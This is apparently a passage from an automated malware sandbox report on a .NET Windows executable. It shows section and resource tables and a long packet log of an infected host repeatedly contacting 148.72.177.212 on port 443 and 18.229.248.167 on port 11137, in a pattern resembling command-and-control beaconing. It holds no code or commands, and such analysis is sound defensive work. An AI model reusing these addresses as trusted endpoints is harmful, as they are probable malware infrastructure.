                                                                                                .rsrc0x80000x4d80x600False0.37109375data3.6941710688974494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0xa0000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_VERSION0x80a00x244data0.46206896551724136
                                                                                                RT_MANIFEST0x82e80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                                                DLLImport
                                                                                                mscoree.dll_CorExeMain

                                                                                                Download Network PCAP: filteredfull

                                                                                                • Total Packets: 989
                                                                                                • 11137 undefined
                                                                                                • 443 (HTTPS)
                                                                                                • 53 (DNS)
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Nov 23, 2023 01:08:53.051096916 CET49704443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:08:53.051136971 CET44349704148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:08:53.051234007 CET49704443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:08:53.062108040 CET49704443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:08:53.062119961 CET44349704148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:08:53.322118044 CET44349704148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:08:53.322338104 CET49704443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:08:53.325031996 CET49704443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:08:53.325037003 CET44349704148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:08:53.325277090 CET44349704148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:08:53.373516083 CET49704443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:08:53.397392035 CET49704443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:08:53.441289902 CET44349704148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:08:53.810070992 CET44349704148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:08:53.810323954 CET44349704148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:08:53.810493946 CET49704443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:08:53.812608957 CET49704443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:08:53.954174995 CET4970511137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:08:54.161600113 CET111374970518.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:08:54.670442104 CET4970511137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:08:54.877985954 CET111374970518.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:08:55.389328957 CET4970511137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:08:55.596746922 CET111374970518.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:08:56.107928991 CET4970511137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:08:56.315886974 CET111374970518.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:08:56.826636076 CET4970511137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:08:57.034252882 CET111374970518.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:08:57.142838001 CET49706443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:08:57.142880917 CET44349706148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:08:57.142967939 CET49706443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:08:57.143641949 CET49706443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:08:57.143656969 CET44349706148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:08:57.393428087 CET44349706148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:08:57.395692110 CET49706443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:08:57.395715952 CET44349706148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:08:57.671679974 CET44349706148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:08:57.671876907 CET44349706148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:08:57.671936989 CET49706443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:08:57.673202038 CET49706443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:08:57.674834967 CET4970711137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:08:57.882215977 CET111374970718.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:08:58.389110088 CET4970711137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:08:58.596550941 CET111374970718.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:08:59.107832909 CET4970711137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:08:59.315876961 CET111374970718.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:08:59.826548100 CET4970711137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:00.034256935 CET111374970718.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:00.545304060 CET4970711137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:00.752923965 CET111374970718.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:00.876058102 CET49708443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:00.876106024 CET44349708148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:00.876199961 CET49708443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:00.876750946 CET49708443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:00.876764059 CET44349708148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:01.131855011 CET44349708148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:01.133795023 CET49708443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:01.133817911 CET44349708148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:01.410115004 CET44349708148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:01.410204887 CET44349708148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:01.410280943 CET49708443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:01.411474943 CET49708443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:01.412867069 CET4970911137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:01.620393038 CET111374970918.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:02.123450994 CET4970911137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:02.331049919 CET111374970918.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:02.842186928 CET4970911137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:03.049905062 CET111374970918.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:03.561019897 CET4970911137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:03.768549919 CET111374970918.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:04.279647112 CET4970911137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:04.487230062 CET111374970918.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:04.595422029 CET49710443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:04.595494032 CET44349710148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:04.595607996 CET49710443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:04.596036911 CET49710443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:04.596071959 CET44349710148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:04.850292921 CET44349710148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:04.852376938 CET49710443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:04.852474928 CET44349710148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:05.131539106 CET44349710148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:05.131635904 CET44349710148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:05.131716967 CET49710443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:05.132639885 CET49710443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:05.133889914 CET4971111137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:05.341192961 CET111374971118.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:05.842195034 CET4971111137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:06.049943924 CET111374971118.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:06.560971975 CET4971111137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:06.768383026 CET111374971118.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:07.279846907 CET4971111137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:07.487248898 CET111374971118.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:07.998528004 CET4971111137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:08.206016064 CET111374971118.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:09.141166925 CET49712443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:09.141190052 CET44349712148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:09.141267061 CET49712443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:09.141784906 CET49712443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:09.141796112 CET44349712148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:09.404335976 CET44349712148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:09.406649113 CET49712443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:09.406666040 CET44349712148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:09.681040049 CET44349712148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:09.681184053 CET44349712148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:09.681238890 CET49712443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:09.682179928 CET49712443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:09.683286905 CET4971311137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:09.890698910 CET111374971318.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:10.404828072 CET4971311137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:10.612466097 CET111374971318.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:11.123370886 CET4971311137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:11.330662012 CET111374971318.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:11.842127085 CET4971311137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:12.049403906 CET111374971318.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:12.560859919 CET4971311137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:12.768085957 CET111374971318.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:12.875783920 CET49722443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:12.875825882 CET44349722148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:12.875900984 CET49722443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:12.876353025 CET49722443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:12.876365900 CET44349722148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:13.132931948 CET44349722148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:13.145567894 CET49722443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:13.145579100 CET44349722148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:13.417363882 CET44349722148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:13.417418003 CET44349722148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:13.417665005 CET49722443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:13.418524981 CET49722443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:13.419995070 CET4972311137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:13.627243042 CET111374972318.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:14.139075041 CET4972311137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:14.346344948 CET111374972318.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:14.857765913 CET4972311137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:15.065156937 CET111374972318.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:15.576771021 CET4972311137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:15.784063101 CET111374972318.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:16.295433044 CET4972311137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:16.502890110 CET111374972318.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:16.610306978 CET49724443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:16.610393047 CET44349724148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:16.610486984 CET49724443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:16.611128092 CET49724443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:16.611165047 CET44349724148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:16.863809109 CET44349724148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:16.866209984 CET49724443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:16.866283894 CET44349724148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:17.149338007 CET44349724148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:17.149414062 CET44349724148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:17.149504900 CET49724443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:17.150242090 CET49724443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:17.151616096 CET4972511137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:17.359214067 CET111374972518.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:17.873508930 CET4972511137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:18.081099033 CET111374972518.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:18.592305899 CET4972511137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:18.799957037 CET111374972518.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:19.311017036 CET4972511137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:19.518615961 CET111374972518.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:20.029654980 CET4972511137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:20.237494946 CET111374972518.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:20.344353914 CET49726443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:20.344393015 CET44349726148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:20.344486952 CET49726443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:20.344971895 CET49726443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:20.344988108 CET44349726148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:20.597409964 CET44349726148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:20.599354982 CET49726443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:20.599384069 CET44349726148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:20.877913952 CET44349726148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:20.877998114 CET44349726148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:20.878074884 CET49726443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:20.878865957 CET49726443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:20.880017996 CET4972711137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:21.087713957 CET111374972718.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:21.592113018 CET4972711137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:21.799794912 CET111374972718.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:22.310950041 CET4972711137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:22.518636942 CET111374972718.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:23.029938936 CET4972711137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:23.237644911 CET111374972718.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:23.748502016 CET4972711137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:23.956212044 CET111374972718.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:24.063877106 CET49728443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:24.063911915 CET44349728148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:24.064059019 CET49728443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:24.064549923 CET49728443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:24.064563990 CET44349728148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:24.321974039 CET44349728148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:24.324034929 CET49728443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:24.324052095 CET44349728148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:24.657215118 CET44349728148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:24.657403946 CET44349728148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:24.657640934 CET49728443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:24.658684015 CET49728443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:24.659979105 CET4972911137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:24.868227959 CET111374972918.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:25.373435974 CET4972911137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:25.580849886 CET111374972918.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:26.092551947 CET4972911137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:26.301275015 CET111374972918.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:26.810823917 CET4972911137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:27.018366098 CET111374972918.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:27.529777050 CET4972911137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:27.737229109 CET111374972918.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:27.845081091 CET49730443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:27.845102072 CET44349730148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:27.845237017 CET49730443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:27.845911026 CET49730443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:27.845921040 CET44349730148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:28.104262114 CET44349730148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:28.106883049 CET49730443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:28.106900930 CET44349730148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:28.381160021 CET44349730148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:28.381274939 CET44349730148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:28.381436110 CET49730443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:28.382030010 CET49730443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:28.383461952 CET4973111137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:28.590715885 CET111374973118.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:29.092076063 CET4973111137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:29.299561977 CET111374973118.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:29.810817003 CET4973111137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:30.018105984 CET111374973118.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:30.529697895 CET4973111137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:30.737097979 CET111374973118.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:31.248548031 CET4973111137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:31.456053019 CET111374973118.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:31.563318968 CET49732443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:31.563349962 CET44349732148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:31.563455105 CET49732443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:31.563935041 CET49732443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:31.563946962 CET44349732148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:31.825277090 CET44349732148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:31.827733040 CET49732443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:31.827749968 CET44349732148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:32.107928991 CET44349732148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:32.108078957 CET44349732148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:32.108268023 CET49732443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:32.109407902 CET49732443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:32.110862970 CET4973311137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:32.318324089 CET111374973318.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:32.826607943 CET4973311137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:33.034322023 CET111374973318.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:33.545408010 CET4973311137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:33.753099918 CET111374973318.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:34.264051914 CET4973311137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:34.471683979 CET111374973318.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:34.982790947 CET4973311137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:35.190391064 CET111374973318.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:35.297665119 CET49734443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:35.297775984 CET44349734148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:35.297864914 CET49734443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:35.298485994 CET49734443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:35.298526049 CET44349734148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:35.558653116 CET44349734148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:35.560806990 CET49734443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:35.560837984 CET44349734148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:35.840015888 CET44349734148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:35.840179920 CET44349734148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:35.840272903 CET49734443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:35.841555119 CET49734443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:35.843363047 CET4973511137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:36.050796032 CET111374973518.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:36.560817003 CET4973511137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:36.768476963 CET111374973518.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:37.279699087 CET4973511137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:37.487226009 CET111374973518.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:37.998465061 CET4973511137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:38.205878973 CET111374973518.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:38.717056990 CET4973511137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:38.924520969 CET111374973518.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:39.032111883 CET49736443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:39.032170057 CET44349736148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:39.032285929 CET49736443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:39.032917976 CET49736443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:39.032934904 CET44349736148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:39.294169903 CET44349736148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:39.296366930 CET49736443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:39.296380043 CET44349736148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:39.874640942 CET44349736148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:39.874819040 CET44349736148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:39.874886036 CET49736443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:39.875962019 CET49736443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:39.877739906 CET4973711137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:40.085036993 CET111374973718.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:40.592133045 CET4973711137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:40.799561977 CET111374973718.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:41.310810089 CET4973711137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:41.522953987 CET111374973718.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:42.029674053 CET4973711137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:42.237040997 CET111374973718.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:42.748291016 CET4973711137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:42.955661058 CET111374973718.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:43.063245058 CET49738443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:43.063291073 CET44349738148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:43.063384056 CET49738443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:43.063908100 CET49738443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:43.063922882 CET44349738148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:43.316061974 CET44349738148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:43.318176031 CET49738443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:43.318201065 CET44349738148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:43.594187021 CET44349738148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:43.594263077 CET44349738148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:43.594460964 CET49738443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:43.595485926 CET49738443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:43.596812963 CET4973911137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:43.804017067 CET111374973918.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:44.310952902 CET4973911137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:44.518412113 CET111374973918.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:45.029539108 CET4973911137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:45.236895084 CET111374973918.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:45.748322964 CET4973911137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:45.955741882 CET111374973918.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:46.467202902 CET4973911137192.168.2.518.229.248.167
                                                                                                Nov 23, 2023 01:09:46.674748898 CET111374973918.229.248.167192.168.2.5
                                                                                                Nov 23, 2023 01:09:46.782123089 CET49740443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:09:46.782161951 CET44349740148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:09:46.782221079 CET49740443192.168.2.5148.72.177.212
